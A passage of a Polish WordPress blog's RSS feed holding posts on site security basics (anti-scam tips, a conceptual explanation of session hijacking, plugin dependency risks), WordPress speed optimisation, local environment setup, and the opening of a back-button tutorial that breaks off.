zwłaszcza na koniec tygodnia lub na koniec roku, gdzie zazwyczaj panują pewne zawirowania prawne i łatwiej jest wpędzić przedsiębiorców w błąd na podstawie plotek</p><p>Gdybym miała wskazać kilka punktów które pomagają znacznie zredukować ryzyko bycia oszukanym:</p><ul><li>Nigdy nie pozwalamy, by to ktoś decydował za nas, że coś jest ważne. Atakujący chce nam narzucić narrację, którą niekoniecznie przestudiujemy, i paradoksalnie coś co jest ważne dla niego może dla nas nie mieć znaczenia.</li><li>Zawsze w chwilach niepewności podważamy najprostsze założenia &#8211; czy osoba, która do nas dzwoni to na pewno osoba, za którą się podaje? Czy adres email z którego do nas piszą to na pewno oficjalny email firmy? Czy adres zawiera jedynie podobny znak do tego z nazwy firmy, etc…</li><li>Zawsze w przypadku, gdy ktoś nam grozi musimy do tego podejść od strony prawa a nie emocji. Weryfikujemy prawdomówność takiej osoby na podstawie własnej wiedzy, ewentualnie porady prawniczej. Ogólne domniemanie niewinności wymaga od osoby po drugiej stronie przedstawienia realnych informacji do których jako oszust nie powinien mieć dostępu.</li><li>Nigdy nie podajemy danych prywatnych osobom które się z nami kontaktują &#8211; jeżeli jest to pracownik banku, to te dane już ma, jeżeli rozmówca prosi o potwierdzenie informacji, do których potencjalnie ma lub powinien mieć dostęp &#8211; rozłączamy się. To on wykonuje telefon.</li></ul>								</div>
				</div>
				<div class="elementor-element elementor-element-3513f3a elementor-widget elementor-widget-heading" data-id="3513f3a" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">HiJacking</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-cf64dd7 elementor-widget elementor-widget-text-editor" data-id="cf64dd7" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									A właściwie to session hijacking, czyli przejęcie danych pozwalających na nawiązanie połączenia z serwerem w Twoim imieniu.

Chodzi o login i hasło?

Nie. Chodzi o dane, które otrzymujemy po poprawnym zalogowaniu się na stronie.

Trzeba tu trochę wspomnieć o tym jak działa protokół HTTP. Dawno dawno temu gdy strony internetowe nie były niczym innym niż jednokierunkowym źródłem informacji, w których odbiorca nie miał możliwości komentowania, w którym nie było takich rzeczy jak wyrafinowane statystyki odwiedzin, a cała strona to mógł być jedynie kod HTML, nie było wtedy sesji &#8211; połączenie było tzw. stateless i taki też jest protokół HTTP.

Czasy zmieniły się dawno temu i standardem jest, że niemal każda strona internetowa musi mieć jakąś informację związaną z danym użytkownikiem, nawet jeśli nie chodzi o samo logowanie. Poruszając się po stronie możemy zapisywać przeróżne ciasteczka pozwalające nam bez bycia zalogowanym utrzymywać wymianę informacji z serwerem, oraz zapisywać o nas informacje na serwerze.

Przykładowo:
								</div>
				</div>
				<div class="elementor-element elementor-element-b36b1e5 elementor-widget elementor-widget-image" data-id="b36b1e5" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="512" height="265" src="https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat.png" class="attachment-full size-full wp-image-3258" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat-300x155.png 300w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-bb0861d elementor-widget elementor-widget-text-editor" data-id="bb0861d" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Użytkownik za pomocą przeglądarki wchodzi na stronę zajmującą się dostarczaniem żywności pod wskazany adres. Adres użytkownika można przechować na kilka sposobów, lecz najprościej jest zapisać go w sesji tak by większość informacji można było dla użytkownika spersonalizować przy ich wyświetlaniu, i nie pytać go o to co chwilę.</p><p>I co to ma do mojego bezpieczeństwa?</p><p>Specjalnie pogrubiłam tutaj słowo sesja ponieważ jest ono mylone z samymi ciasteczkami.<br />Uzupełnię teraz trochę diagram o kilka bloków więcej:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-2dc2e1a elementor-widget elementor-widget-image" data-id="2dc2e1a" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="512" height="214" src="https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat2.png" class="attachment-full size-full wp-image-3259" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat2.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat2-300x125.png 300w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-146a0d5 elementor-widget elementor-widget-text-editor" data-id="146a0d5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									I okazuje się, że ciasteczka to nie jedyne miejsce, gdzie można przechowywać dane użytkownika

Trochę się gubię

Uprośćmy to do tego, że w większości przypadków w ciasteczkach znajduje się hash naszej sesji, a dopiero sesja przechowuje nasze bardziej prywatne dane. Dzięki temu prywatne dane znajdują się na serwerze w sesjach a nie w ciasteczkach i przeglądarce:
								</div>
				</div>
				<div class="elementor-element elementor-element-4b7e17d elementor-widget elementor-widget-image" data-id="4b7e17d" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="512" height="204" src="https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat3.png" class="attachment-full size-full wp-image-3260" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat3.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/HiJacking-schemat3-300x120.png 300w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-dcbb84c elementor-widget elementor-widget-text-editor" data-id="dcbb84c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Czyli mając wartość ciasteczka innej osoby można się efektywnie pod nią podszyć?</p><p>Tak, jeśli wykradamy ciasteczko zawierające hash naszej sesji z serwerem to jest to wtedy session hijacking i z jego pomocą możemy uzyskać taki efekt jakbyśmy byli danym użytkownikiem.</p><p>Ale to nie moja wina, że użytkownikowi ktoś ukradł ciasteczka</p><p>Może. Na pewno można utrudnić nieco ten proces przez instalację certyfikatu SSL. Zazwyczaj taki certyfikat sprzedawany jest przez webhosting, chociaż osobiście polecam skorzystać z Let’s Encrypt, lub wtyczki Really Simple SSL.</p><p>To takie proste?</p><p>Niestety nie do końca. Sposobów na wykradnięcie ciasteczek użytkownika jest bardzo dużo, i często jest to z winy nietechnicznego użytkownika (otwieranie złośliwych linków, lewe wtyczki do przeglądarki, wirusy, etc.). To co my możemy zrobić to upewnić się, że sami nie instalujemy na naszej stronie podatnych wtyczek, czy dziurawych szablonów o czym będzie potem.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-8f80a79 elementor-widget elementor-widget-heading" data-id="8f80a79" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Dostawcy trzeci</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-f979681 elementor-widget elementor-widget-text-editor" data-id="f979681" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Dużo się ostatnio mówi o tym, że jakaś strona ma problemy z działaniem bo, np. AWS ma problemy ze swoimi usługami, ale my tutaj skupimy się bardziej na ekosystemie wtyczek.</p><p>Czy wiesz, że duża ilość wtyczek nie realizuje swojej funkcjonalności bezpośrednio u Ciebie na serwerze? Ta lista funkcjonalności to nie tylko notyfikowanie użytkownika o nowym CVE dla jednej ze wtyczek na serwerze &#8211; to akurat miałoby prawo nie zadziałać, bo na kolejny dzień prawdopodobnie zostałoby naprawione i dla zdecydowanej większości stron nie miało by to znaczenia.</p><p>Co jeżeli taka wtyczka jest kluczowa dla działania naszej strony? Np. ReCaptcha?</p><p>Ten przykład został wzięty jako pierwszy z brzegu, i w momencie pisania tego artykułu można zaobserwować na stronie <strong>https://downdetector.com</strong> następujący wykres:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-f6c56b0 elementor-widget elementor-widget-image" data-id="f6c56b0" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="512" height="209" src="https://sklep.kobietakoduje.pl/wp-content/uploads/dostawcy-trzeci-recaptcha.png" class="attachment-large size-large wp-image-3264" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/dostawcy-trzeci-recaptcha.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/dostawcy-trzeci-recaptcha-300x122.png 300w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-d547f4c elementor-widget elementor-widget-text-editor" data-id="d547f4c" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Z jednej strony nie wygląda to jak globalna awaria, lecz z drugiej jeśli spojrzymy w komentarze:								</div>
				</div>
				<div class="elementor-element elementor-element-ba574b2 elementor-widget elementor-widget-image" data-id="ba574b2" data-element_type="widget" data-e-type="widget" data-widget_type="image.default">
				<div class="elementor-widget-container">
															<img loading="lazy" decoding="async" width="512" height="111" src="https://sklep.kobietakoduje.pl/wp-content/uploads/dostawcy-trzeci-recaptcha2.png" class="attachment-large size-large wp-image-3265" alt="" srcset="https://sklep.kobietakoduje.pl/wp-content/uploads/dostawcy-trzeci-recaptcha2.png 512w, https://sklep.kobietakoduje.pl/wp-content/uploads/dostawcy-trzeci-recaptcha2-300x65.png 300w" sizes="(max-width: 512px) 100vw, 512px" />															</div>
				</div>
				<div class="elementor-element elementor-element-7e5d0b5 elementor-widget elementor-widget-text-editor" data-id="7e5d0b5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>To zobaczymy jak niektórym może to napsuć w życiu. Co gdyby zacytowany wyżej Peter był klientem naszego sklepu? Niezależnie od tego czy sklep nie działa bo ktoś wykonał na nim atak DDoSowy czy nie, to efekt jest ten sam &#8211; system leży i nie wstaje.</p><p>Bronienie się przed tego rodzaju problemami zazwyczaj składa się z następujących rozwiązań:</p><ul><li>Nie instalujemy kodu realizującego usługi przez serwery pośrednika, jeżeli nie ma takiej potrzeby. W przypadku captchy powinniśmy być w stanie znaleźć wystarczająco dobrą alternatywę.</li><li>Instalujemy więcej niż jedną wtyczkę realizującą te samą funkcjonalność, tak by w przypadku awarii w, np. InPost móc użyć kuriera UPS/DHL, lub w przypadku awarii Przelewy24 użyć PayU (kolejność wymienionych produktów jest losowa).</li></ul>								</div>
				</div>
				<div class="elementor-element elementor-element-c801b75 elementor-widget elementor-widget-button" data-id="c801b75" data-element_type="widget" data-e-type="widget" data-widget_type="button.default">
				<div class="elementor-widget-container">
									<div class="elementor-button-wrapper">
					<a class="elementor-button elementor-button-link elementor-size-sm" href="https://kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-ii">
						<span class="elementor-button-content-wrapper">
						<span class="elementor-button-icon">
				<i aria-hidden="true" class="fas fa-arrow-right"></i>			</span>
									<span class="elementor-button-text">Przejdź do II cz. artykułu</span>
					</span>
					</a>
				</div>
								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/bezpieczenstwo-w-wordpress-cz-i/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Jak przyśpieszyć stronę w wordpress?</title>
		<link>https://sklep.kobietakoduje.pl/jak-przyspieszyc-strone-w-wordpress/</link>
					<comments>https://sklep.kobietakoduje.pl/jak-przyspieszyc-strone-w-wordpress/#respond</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Mon, 07 Feb 2022 19:58:59 +0000</pubDate>
				<category><![CDATA[SEM/SEO]]></category>
		<category><![CDATA[Sklep internetowy]]></category>
		<category><![CDATA[Strona www]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=3212</guid>

					<description><![CDATA[<p>Uaktualnij do PHP 7.4 Witryny oparte o WooCommerce powinny zawsze działać w szybkiej wersji PHP (w tym momencie stabilną wersją jest PHP 7.4), którą możesz zaktualizować na swoim serwerze. Większość użytkowników WordPressa korzysta z przestarzałych wersji PHP co znacznie obniża prędkość działania strony. Zoptymalizuj obrazki Zdjęcia na Twojej stronie powinny być jak najlżejsze. Zważ również [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="3212" class="elementor elementor-3212" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-cb46b5f elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="cb46b5f" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-c2fe8e1" data-id="c2fe8e1" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-877e35e elementor-widget elementor-widget-heading" data-id="877e35e" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Uaktualnij do PHP 7.4</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-800cb39 elementor-widget elementor-widget-text-editor" data-id="800cb39" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Witryny oparte o WooCommerce powinny zawsze działać w szybkiej wersji PHP (w tym momencie stabilną wersją jest PHP 7.4), którą możesz zaktualizować na swoim serwerze. Większość użytkowników WordPressa korzysta z przestarzałych wersji PHP co znacznie obniża prędkość działania strony.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-9cfe118 elementor-widget elementor-widget-heading" data-id="9cfe118" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Zoptymalizuj obrazki</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-32ef7d3 elementor-widget elementor-widget-text-editor" data-id="32ef7d3" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Zdjęcia na Twojej stronie powinny być jak najlżejsze. Zważ również na to, że czasem aby logo miało wysoką jakość, ale niską wagę warto zapisać je w formacie svg. Ja do optymalizacji zdjęć używam bezstratnej kompresji <a href="http://optimizilla.com/">optimizilla.com</a>. Czasem jednak warto zoptymalizować zdjęcia dodatkowo. Spróbuj wtyczki <a href="https://pl.wordpress.org/plugins/wp-smushit/">Smush</a>.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-ef8bc50 elementor-widget elementor-widget-heading" data-id="ef8bc50" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Usuń nadużywanie WooCommerce</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-3155ce3 elementor-widget elementor-widget-text-editor" data-id="3155ce3" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Możesz to zrobić za pomocą wtyczki <a href="https://wordpress.org/plugins/disable-dashboard-for-woocommerce/">Disable WooCommerce Bloat </a>wyłącz skrypty i style WooCommerce w treściach innych niż eCommerce, ponieważ nie trzeba ładować ich na każdej stronie, są one potrzebne tylko do obsługi zakupów. Dzięki tej wtyczce wyłączysz też śmieci WooCommerce w administratorze – widżety, analizy, powiadomienia, statusy itp.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-f37c607 elementor-widget elementor-widget-heading" data-id="f37c607" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Skonfiguruj wtyczkę do czyszczenia pamięci podręcznej</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-1d40dab elementor-widget elementor-widget-text-editor" data-id="1d40dab" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Istnieje wiele wtyczek które wyczyszczą podręczną pamięć zapisaną w Twojej witrynie:<br />WP Rocket<br />WP Fastest Cache<br />WP-Optimize<br />WP Super Cache<br /><strong>W3 Total Cache</strong><br />Ja polecam tę ostatnią ponieważ pozwala ona również na konfigurację innych opcji, które mają bardzo duży wpływ na prędkość wczytywania się Twojej strony internetowej. Warto pamiętać aby zmiany wprowadzać sukcesywnie i bardzo ostrożnie. Ja po każdej wykonanej zmianie sprawdzam prędkość w przeglądarce (zakładka network) i w Gtmetrix, tak więc proszę pamietaj o tym aby zmian dokonywać krok po kroku, gdyż niektóre zmiany mogą skutkować nawet zwolnieniem Twojej witryny. Zdjęcia ekranu konkretnych ustawień po kolei znajdziesz klikając <a href="https://kobietakoduje.pl/wp-content/uploads/kk/optymalizacjaw3.pdf" target="_blank" rel="noopener">tutaj</a>.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-69e5a39 elementor-widget elementor-widget-heading" data-id="69e5a39" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Usuń śmieci ze swojej bazy danych - WP Clean Up</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-9e5b3f2 elementor-widget elementor-widget-text-editor" data-id="9e5b3f2" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Prawdopodobnie na Twojej stronie znajdujących się niepotrzebne, przeterminowane treści. Jeśli dodano jakąś stronę, wpis, grafikę lub wtyczkę, a potem ją usunięto, zapis o niej w bazie danych nadal tam jest. Możesz więc usunąć te wszystkie zbędne dane, komentarze, osierocone pliki meta, postmeta i inne.
								</div>
				</div>
				<div class="elementor-element elementor-element-9c3701b elementor-widget elementor-widget-heading" data-id="9c3701b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Blokuj złe boty</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-b106526 elementor-widget elementor-widget-text-editor" data-id="b106526" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Złe boty potrafią uprzykrzyć nam życie. Mogą tworzyć fałszywe konta, dodawać spamerskie komentarze i generalnie zakłócać wszystkie funkcjonalności Twojej witryny na WordPress. Mają wpływ na wolne wczytywanie się strony, a sam wordpress jest oprogramowaniem podatnym na tego typu ataki.</p><p>Aby ochronić się przed złymi botami polecam wtyczkę iThemes Security, która pozwala chronić Twoją tożsamość i powstrzymuje złośliwe zachowania. Po odpowiedniej konfiguracji tej wtyczki dostaniesz ostrzeżenie przy wykryciu kolejnej aktywności dot. naruszenia.</p>								</div>
				</div>
				<div class="elementor-element elementor-element-f4a02f3 elementor-widget elementor-widget-heading" data-id="f4a02f3" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Wyłącz bicie serca</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-0fdd7ef elementor-widget elementor-widget-text-editor" data-id="0fdd7ef" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>WordPress co 15-60 sekund generuje żądania i wyświetla powiadomienia o wtyczkach w czasie rzeczywistym, dostarcza on informacji o edytowanych postach przez innych użytkowników. Aby wyłączyć bicie serca, dodaj ten kod do plicu functions.php w swoim szablonie:</p><pre>add_action( 'init', 'stop_heartbeat', 1 );
function stop_heartbeat() {
wp_deregister_script('heartbeat');
}
</pre>								</div>
				</div>
				<div class="elementor-element elementor-element-173b1d9 elementor-widget elementor-widget-heading" data-id="173b1d9" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Zoptymalizuj czcionki Google</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-24a4bf8 elementor-widget elementor-widget-text-editor" data-id="24a4bf8" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Istnieje kilka sposobów na optymalizację czcionek. Zwróć uwagę na to by ograniczyć liczbę czcionek, grubości i ikon wczytywanych w Twojej witrynie. Najlepiej hostuj je lokalnie i upewnij, się że tekst pozostaje widoczny podczas ładowania czcionek internetowych za pomocą WP Rocket lub wtyczki Swap Google Fonts Display.
								</div>
				</div>
				<div class="elementor-element elementor-element-7ac356b elementor-widget elementor-widget-heading" data-id="7ac356b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Zmniejsz TTFB dzięki szybszemu hostingowi</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-99b64df elementor-widget elementor-widget-text-editor" data-id="99b64df" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Aby zmniejszyć czas odpowiedzi serwera zastanów się nad migracją na szybszy, bardziej wydajny hosting – np.z szybszym łączem o mocniejszym CPU i większej ilości RAMu. Pamiętaj, że lokalizacja geograficzna serwera powinna być najbliżej Twoich docelowych użytkowników – warto przy tym zadbać aby serwer HTTP, Back-End i bazy danych były umieszczone w tym samym centrum danych. Aby zbadać TTFB w opcjach przeglądarki internetowej wybierz zakładkę Netwotk (w przeglądarce Chrome – klawisz F12). 
								</div>
				</div>
				<div class="elementor-element elementor-element-bf607a9 elementor-widget elementor-widget-heading" data-id="bf607a9" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Unikaj instalowania wtyczek
</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-97c62bd elementor-widget elementor-widget-text-editor" data-id="97c62bd" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Zbyt duża ilość wtyczek powoduje wolne randerowanie się strony. Spowodowane jest to faktem, że każdy dodatkowy moduł ładuje swoje dodatkowe skrypty i zwiększa używanie zasobów serwera.Dodatkowo wzmagasz w ten sposób potencjał ataków na Twoją witrynę, ponieważ, każda dodatkow wtyczka, która nie jest aktualizowana, może stanowić zagrożenie dla Twojej witryny.
								</div>
				</div>
				<div class="elementor-element elementor-element-f41bac7 elementor-widget elementor-widget-heading" data-id="f41bac7" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
				<div class="elementor-widget-container">
					<h2 class="elementor-heading-title elementor-size-default">Zmień adres logowania się do swojej witryny</h2>				</div>
				</div>
				<div class="elementor-element elementor-element-20b5217 elementor-widget elementor-widget-text-editor" data-id="20b5217" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Złe boty będą próbowały uzyskać dostęp do Twojego panelu logowania wp &#8211; powoduje to niepotrzebne zjadanie zasobów serwera. Aby zabezpieczyć się przed niechcianym obciążeniem dodaj i skonfiguruj wtyczkę <strong>Hide My WP.</strong></p>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/jak-przyspieszyc-strone-w-wordpress/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Jak zainstalować środowisko lokalne</title>
		<link>https://sklep.kobietakoduje.pl/jak-zainstalowac-srodowisko-lokalne/</link>
					<comments>https://sklep.kobietakoduje.pl/jak-zainstalowac-srodowisko-lokalne/#respond</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Mon, 08 Nov 2021 20:08:43 +0000</pubDate>
				<category><![CDATA[IT]]></category>
		<category><![CDATA[Sklep internetowy]]></category>
		<category><![CDATA[Strona www]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=2825</guid>

					<description><![CDATA[<p>Tutorial o tym jak skonfigurować środowisko serwera, bazę danych oraz jak zainstalować wordpressa na dysku Twojego komputera znajduje się poniżej: Jeśli chcesz uruchomić na środowisku lokalnym kopię strony którą ściągnęłaś właśnie z serwera i z jakiejś przyczyny, nie umiesz zalogować się do wordpressa lokalnie, być może musisz zmienić adres strony internetowej. W tym celu zaloguj [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="2825" class="elementor elementor-2825" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-07b5cef elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="07b5cef" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-6eae2b0" data-id="6eae2b0" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-cd6b014 elementor-widget elementor-widget-text-editor" data-id="cd6b014" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Tutorial o tym jak skonfigurować środowisko serwera, bazę danych oraz jak zainstalować wordpressa na dysku Twojego komputera znajduje się poniżej:</p>								</div>
				</div>
				<div class="elementor-element elementor-element-0120a2d elementor-widget elementor-widget-html" data-id="0120a2d" data-element_type="widget" data-e-type="widget" data-widget_type="html.default">
				<div class="elementor-widget-container">
					<iframe width="560" height="315" src="https://www.youtube.com/embed/tQYaHimvyOU" title="YouTube video player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>				</div>
				</div>
				<div class="elementor-element elementor-element-694b895 elementor-widget elementor-widget-text-editor" data-id="694b895" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									<p>Jeśli chcesz uruchomić na środowisku lokalnym kopię strony którą ściągnęłaś właśnie z serwera i z jakiejś przyczyny, nie umiesz zalogować się do wordpressa lokalnie, być może musisz zmienić adres strony internetowej. W tym celu zaloguj się do phpmyadmin i sprawdź zakładkę &#8222;wp_options&#8221; w pola siteurl i home wpisz: http://localhost/TwojKatalogZeStrona.</p><p>Warto też sprawdzić plik wp_config.php który znajduje się w folderze htdocs, sprawdź czy w adresie bazy danych nie znajduje się jej stary adres, powinno być tam &#8222;localhost&#8221;.</p>								</div>
				</div>
					</div>
		</div>
					</div>
		</section>
				</div><p></p>]]></content:encoded>
					
					<wfw:commentRss>https://sklep.kobietakoduje.pl/jak-zainstalowac-srodowisko-lokalne/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Przycisk &#8222;wróć&#8221; w wordpress</title>
		<link>https://sklep.kobietakoduje.pl/przycisk-wroc-w-wordpress/</link>
					<comments>https://sklep.kobietakoduje.pl/przycisk-wroc-w-wordpress/#comments</comments>
		
		<dc:creator><![CDATA[kobieta koduje]]></dc:creator>
		<pubDate>Tue, 17 Aug 2021 07:48:04 +0000</pubDate>
				<category><![CDATA[Sklep internetowy]]></category>
		<category><![CDATA[Woocommerce]]></category>
		<category><![CDATA[Wordpress www]]></category>
		<category><![CDATA[Wordpress]]></category>
		<guid isPermaLink="false">https://kobietakoduje.pl/?p=1044</guid>

					<description><![CDATA[<p>Jeśli zastanawiasz się jak stworzyć przycisk powracający do poprzedniej strony (historia przeglądarki) w aplikacji wordpress, to trafiłaś/eś w odpowiednie miejsce. Wystarczy że w stopce swojej strony internetowej dodasz poniższy skrypt: &#60;pre&#62;&#60;script&#62;&#60;![CDATA[ function goBack() { window.history.back() } // ]]&#62; &#60;/script&#62;&#60;/pre&#62; A w miejscu gdzie ma wyświetlać się przycisk: &#60;pre&#62; &#60;button class=&#34;wroc&#34;&#62;Wr&#243;ć&#60;/button&#62; &#60;/pre&#62; Następnie możesz przejść do [&#8230;]</p>
<p></p>]]></description>
										<content:encoded><![CDATA[<div data-elementor-type="wp-post" data-elementor-id="1044" class="elementor elementor-1044" data-elementor-post-type="post">
						<section class="elementor-section elementor-top-section elementor-element elementor-element-1e30c04 elementor-section-boxed elementor-section-height-default elementor-section-height-default" data-id="1e30c04" data-element_type="section" data-e-type="section">
						<div class="elementor-container elementor-column-gap-default">
					<div class="elementor-column elementor-col-100 elementor-top-column elementor-element elementor-element-859fe09" data-id="859fe09" data-element_type="column" data-e-type="column">
			<div class="elementor-widget-wrap elementor-element-populated">
						<div class="elementor-element elementor-element-0ae37eb elementor-widget elementor-widget-text-editor" data-id="0ae37eb" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
				<div class="elementor-widget-container">
									Jeśli zastanawiasz się jak stworzyć przycisk powracający do poprzedniej strony (historia przeglądarki) w aplikacji wordpress, to trafiłaś/eś w odpowiednie miejsce.
Wystarczy że w stopce swojej strony internetowej dodasz poniższy skrypt:
								</div>
				</div>
				<div class="elementor-element elementor-element-fa9f48f elementor-widget elementor-widget-code-block-for-elementor" data-id="fa9f48f" data-element_type="widget" data-e-type="widget" data-widget_type="code-block-for-elementor.default">
				<div class="elementor-widget-container">
